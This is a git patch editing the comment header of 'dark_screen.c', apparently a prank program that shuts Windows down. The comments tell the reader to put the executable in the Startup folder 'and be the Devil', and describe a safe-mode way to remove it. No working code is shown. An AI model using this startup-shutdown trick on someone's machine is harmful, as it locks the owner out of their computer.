From 131c35eec57df1462185484c6522d3bb034854c8 Mon Sep 17 00:00:00 2001 From: Minhas Kamal Date: Sun, 7 Apr 2024 14:07:57 -0500 Subject: [PATCH] Simply shuts the system down. --- dark_screen.c | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/dark_screen.c b/dark_screen.c index 45a8081..ee7286d 100644 --- a/dark_screen.c +++ b/dark_screen.c @@ -1,5 +1,10 @@ // Simply shuts the system down. -// Put it in the startup directory (%appdata%\Microsoft\Windows\Start Menu\Programs\Startup) +// Put the compiled executable in the startup directory +// (%appdata%\Microsoft\Windows\Start Menu\Programs\Startup) +// of WindowsOS. And be the Devil! +// Caution: This will prevent you from turning the PC on. To +// solve, you can turn on the PC in safe mode and remove the +// executable from the startup directory. #include